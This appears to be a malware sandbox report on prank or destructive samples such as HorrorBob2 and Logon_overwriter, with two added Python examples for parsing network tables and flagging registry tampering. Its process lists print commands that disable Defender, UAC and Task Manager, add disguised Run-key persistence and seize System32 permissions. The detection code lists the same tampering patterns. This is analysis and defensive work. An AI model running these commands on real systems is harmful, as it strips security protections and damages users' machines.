PID 3068 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3068 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3068 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3068 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\B76.tmp\HorrorBob2.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

memory/3044-0-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B76.tmp\HorrorBob2.bat

MD5 b11c0b55dba339bbe3169584fa0eedd8
SHA1 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256 f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA512 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

C:\Users\Admin\AppData\Local\Temp\B76.tmp\prompt.vbs

MD5 52ac951762c9b42fb4492dfdde2ba4ae
SHA1 0821a0dea46432fc4db10a2dc6312d42a872ab9f
SHA256 9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3
SHA512 c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530

C:\Users\Admin\AppData\Local\Temp\B76.tmp\blood.bmp

MD5 436552127279e0e66663c24ed8edb8d6
SHA1 03df44401c9507a9014334a6cdbf92fd94697e30
SHA256 f478b856ac28b03a3ccf51f41b507edf1469c29018baecfba081b45c813447fa
SHA512 8ad79a8469c1c9d3461ef0ceb49123a2d2678e1db06b72995d2bc03b72ff46cf37167d7d434fa533f2565b96b3e28ae63d30d8a19efaa4e6222fc743828345f9

C:\Users\Admin\AppData\Local\Temp\B76.tmp\Service64.exe

MD5 db42ecfa07b2f2539b3def05e4d1700a
SHA1 1e7f7aac6e98ab81b16015f5f0b570c1396e76ce
SHA256 2c1e4b0af91abdd877f79572ff6535296f2c727148d4db4849259878b2ca6d21
SHA512 e9696444e6479699018291bdddeaa1e804dc37ad8455b274604f166d3f3e8586c0ff75cb089d9bebfa095719fb11ee1748fe9a8164bbb47cb8b55d61e1283ad0

memory/3044-29-0x0000000000400000-0x000000000132F000-memory.dmp

memory/2752-30-0x0000000002D90000-0x0000000002D91000-memory.dmp

memory/2696-31-0x0000000002B30000-0x0000000002B31000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

120s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 udp
IE 52.111.236.21:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 211.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
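
Almost every row in this Network table (and in the behavioral2 and behavioral20 tables) is a UDP/53 query for an in-addr.arpa name, that is, a reverse lookup of an address the host has already talked to; the table carries no process column, so none of it can be attributed to the sample without correlation. The following is an added example, not part of the sandbox report, that parses this table format, turns the reverse names back into dotted addresses, and leaves a short list of destinations that nothing in the table names. The sample rows are copied from the behavioral12 table above (including the rows whose Domain column is blank); the output keys are this example's own.

```python
"""Added example: reduce a sandbox 'Network' table (Country Destination Domain Proto)
to the destinations worth attributing to the sample. Not part of the report."""
from collections import Counter, defaultdict

PTR_SUFFIX = ".in-addr.arpa"

# Rows copied from the behavioral12 Network table; the Domain column is blank on some rows.
SAMPLE_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 udp
IE 52.111.236.21:443 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
"""


def ptr_to_ip(name):
    """'200.197.79.204.in-addr.arpa' -> '204.79.197.200'; None if not an IPv4 reverse name."""
    name = name.lower()
    if not name.endswith(PTR_SUFFIX):
        return None
    octets = name[: -len(PTR_SUFFIX)].split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) < 256 for o in octets):
        return None
    return ".".join(reversed(octets))


def parse_row(line):
    """One table row -> dict; rows have 3 fields when Domain is blank, 4 otherwise."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        (country, dest, proto), domain = parts, None
    else:
        raise ValueError(f"unexpected row: {line!r}")
    ip, port = dest.rsplit(":", 1)
    return {"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto.lower()}


def summarize(lines):
    """Split DNS noise from real connections; everything is returned as plain dicts/counts."""
    ptr, fwd, unnamed = Counter(), Counter(), 0
    conns, names = Counter(), defaultdict(set)
    for line in lines:
        if not line.strip() or line.startswith("Country"):
            continue  # blank line or table header
        row = parse_row(line)
        if row["proto"] == "udp" and row["port"] == 53:
            if row["domain"] is None:
                unnamed += 1                          # query the report did not label
            elif ptr_to_ip(row["domain"]):
                ptr[ptr_to_ip(row["domain"])] += 1    # reverse lookup of an address already contacted
            else:
                fwd[row["domain"]] += 1               # forward lookup of a hostname
        else:
            key = (row["ip"], row["port"], row["proto"])
            conns[key] += 1
            if row["domain"]:
                names[key].add(row["domain"])
    return {"ptr_lookups": dict(ptr), "forward_lookups": dict(fwd), "unnamed_dns": unnamed,
            "connections": dict(conns), "connection_names": dict(names)}


def unlabelled_connections(summary):
    """Connections with no domain on their row and no reverse lookup of their IP anywhere in
    the table: the first destinations to pivot on, since nothing in the report names them."""
    return [key for key in sorted(summary["connections"])
            if not summary["connection_names"].get(key) and key[0] not in summary["ptr_lookups"]]


if __name__ == "__main__":
    s = summarize(SAMPLE_TABLE.splitlines())
    print("forward lookups:", s["forward_lookups"])
    print("reverse-resolved addresses:", sorted(s["ptr_lookups"]))
    print("unlabelled connections:", unlabelled_connections(s))
```

On the sample rows this leaves one destination, 52.111.236.21:443, with no name and no reverse lookup; the bing.net traffic is named on its own rows and 204.79.197.200 is also reverse-resolved. Whether such a destination belongs to the sample or to the OS still has to be settled from the process that opened the socket, which this table does not record.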

Files

memory/4568-0-0x0000000000400000-0x00000000004FA000-memory.dmp

memory/4568-5-0x0000000000400000-0x00000000004FA000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

161s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\LogonUI.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"
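
The reg.exe, net.exe and shutdown.exe lines in the behavioral5 Processes list, the ConsentPromptBehaviorAdmin write in behavioral2, and the takeown/icacls chain in this behavioral29 list are the whole of the sample's tampering, and all of it is visible on a process command-line feed. What follows is an added example, not the sandbox's own signature logic and not code from the sample: a small Python classifier that normalises reg.exe key names (long and short hive names, the Wow6432Node redirection seen in the signature rows), flags the policy values this report shows being set, and matches the takeown/icacls pair on System32 in both the raw `%username%` form and the expanded `Admin:F` form. Rule labels and the PROTECTED_DIRS list are this example's own choices. Two points a practitioner should keep in mind: EnableLUA=0 only takes effect after a reboot, which is why the behavioral5 batch file ends in `shutdown /r /t 00`; and takeown on System32 requires SeTakeOwnershipPrivilege (the AdjustPrivilegeToken entry above), so a hit on that rule means an already-elevated process is rewriting ACLs, not an exploit that raises privileges.

```python
"""Added example: flag the registry / ACL tampering commands that appear in the process
lists of this report (behavioral2, behavioral5, behavioral29). Not part of the report."""
import re

# reg.exe accepts long and short hive names; normalise to the short form.
HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKLM": "HKLM", "HKEY_CURRENT_USER": "HKCU", "HKCU": "HKCU",
         "HKEY_USERS": "HKU", "HKU": "HKU", "HKEY_CLASSES_ROOT": "HKCR", "HKCR": "HKCR"}

# (lower-cased key, lower-cased value name) -> (data that indicates tampering or None for any, label)
POLICY_RULES = {
    (r"hklm\software\microsoft\windows\currentversion\policies\system", "enablelua"):
        ("0", "UAC disabled (EnableLUA=0; effective after reboot)"),
    (r"hklm\software\microsoft\windows\currentversion\policies\system", "consentpromptbehavioradmin"):
        ("0", "UAC admin consent prompt disabled"),
    (r"hkcu\software\microsoft\windows\currentversion\policies\system", "disabletaskmgr"):
        ("1", "Task Manager disabled"),
    (r"hklm\software\policies\microsoft\windows defender", "disableantispyware"):
        ("1", "Defender disabled by policy"),
    (r"hkcu\software\microsoft\windows\currentversion\policies\activedesktop", "nochangingwallpaper"):
        ("1", "wallpaper change locked"),
    (r"hkcu\control panel\desktop", "wallpaper"):
        (None, "desktop wallpaper replaced"),
}
RUN_KEY_RE = re.compile(r"\\microsoft\\windows\\currentversion\\run(once)?$", re.I)
PROTECTED_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}  # example's own list

# Command lines copied from the behavioral5 and behavioral29 Processes lists above.
SAMPLE_CMDLINES = [
    r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\B76.tmp\HorrorBob2.bat" "',
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f",
    r'reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f',
    r"RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters",
    r"reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f",
    r'Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"',
    r'net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"',
    r"shutdown /r /t 00",
    r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"',
]


def win_tokens(cmdline):
    """Split a cmd.exe-style line on whitespace outside double quotes, dropping the quotes.
    (shlex is unsuitable here: in POSIX mode it eats the backslashes of unquoted Windows paths.)"""
    toks, cur, in_q, seen_q = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_q, seen_q = not in_q, True
        elif ch.isspace() and not in_q:
            if cur or seen_q:
                toks.append("".join(cur))
            cur, seen_q = [], False
        else:
            cur.append(ch)
    if cur or seen_q:
        toks.append("".join(cur))
    return toks


def unwrap_cmd(cmdline):
    """Strip a leading 'cmd[.exe] /c|/k ' wrapper and split '&&' / '&' chains into parts."""
    m = re.match(r'^\s*"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+(.*)$', cmdline, re.I)
    inner = m.group(1) if m else cmdline
    return [p.strip() for p in re.split(r"\s*&&?\s*", inner) if p.strip()]


def basename(tok):
    return tok.rsplit("\\", 1)[-1].lower()


def normalize_key(key):
    """'HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\X' -> 'HKLM\\SOFTWARE\\X'; None if no known hive."""
    hive, _, rest = key.partition("\\")
    short = HIVES.get(hive.upper())
    if short is None:
        return None
    rest = re.sub(r"\\wow6432node(?=\\)", "", rest, flags=re.I)  # 32-bit view of the same key
    return short + "\\" + rest


def parse_reg_add(toks):
    """'reg add KEY /v NAME /t TYPE /d DATA /f' -> (KEY, NAME, DATA); None if not a reg add."""
    if len(toks) < 3 or basename(toks[0]) not in ("reg", "reg.exe") or toks[1].lower() != "add":
        return None
    key, name, data, i = toks[2], None, None, 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag in ("/v", "/t", "/d") and i + 1 < len(toks):
            if flag == "/v":
                name = toks[i + 1]
            elif flag == "/d":
                data = toks[i + 1]
            i += 2
        else:
            i += 1  # /f, /ve, /reg:32 ... take no argument
    return key, name, data


def classify(cmdline):
    """Return [(label, evidence), ...] for one process command line; [] if nothing matched."""
    findings = []
    for part in unwrap_cmd(cmdline):
        toks = win_tokens(part)
        if not toks:
            continue
        exe, args = basename(toks[0]), [t.lower().rstrip("\\") for t in toks[1:]]
        reg = parse_reg_add(toks)
        if reg:
            key, name, data = reg
            nkey = normalize_key(key)
            if nkey is None or name is None:
                continue
            rule = POLICY_RULES.get((nkey.lower(), name.lower()))
            if rule and (rule[0] is None or data == rule[0]):
                findings.append((rule[1], f"{nkey}\\{name} = {data}"))
            elif RUN_KEY_RE.search(nkey):
                findings.append(("Run-key persistence", f"{nkey}\\{name} = {data}"))
        elif exe in ("takeown", "takeown.exe") and PROTECTED_DIRS & set(args):
            findings.append(("ownership taken on protected directory", part))
        elif exe in ("icacls", "icacls.exe") and args and args[0] in PROTECTED_DIRS and "/grant" in args:
            findings.append(("ACL grant on protected directory", part))
        elif exe in ("net", "net.exe", "net1", "net1.exe") and args[:1] == ["user"] \
                and any(a.startswith("/fullname:") for a in args):
            findings.append(("account display name changed", part))
        elif exe in ("shutdown", "shutdown.exe") and "/r" in args:
            findings.append(("forced restart", part))
    return findings


def scan(cmdlines):
    """Keep only the command lines that triggered at least one rule."""
    return [(c, classify(c)) for c in cmdlines if classify(c)]


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES):
        for label, evidence in hits:
            print(f"{label:50s} {evidence}")
```

The `cmd /c` wrapper and the `RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters` refresh produce no findings on their own; everything else in the two lists is caught, and the `cmd.exe /k takeown ... && icacls ...` line yields two findings because the chain is split before matching. On a real feed the same rules apply to the Wow6432Node form of the Run key that the signature rows show, since `normalize_key` strips that component before the lookup.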

Network

N/A

Files

memory/1676-0-0x00000000009C0000-0x00000000009CE000-memory.dmp

memory/1676-1-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

memory/1676-2-0x000000001B330000-0x000000001B3B0000-memory.dmp

memory/1676-4-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:57

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.Designer.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.Designer.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=2272,i,17338911640954948469,1637568328132129119,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 172.217.20.202:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 202.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 211.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240215-en

Max time kernel

122s

Max time network

129s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.vbs"

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4348-0-0x00000000006D0000-0x00000000006DA000-memory.dmp

memory/4348-1-0x00007FFF27130000-0x00007FFF27BF1000-memory.dmp

memory/4348-2-0x000000001B390000-0x000000001B3A0000-memory.dmp

memory/4348-3-0x00007FFF27130000-0x00007FFF27BF1000-memory.dmp

memory/4348-4-0x000000001B390000-0x000000001B3A0000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

141s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe"

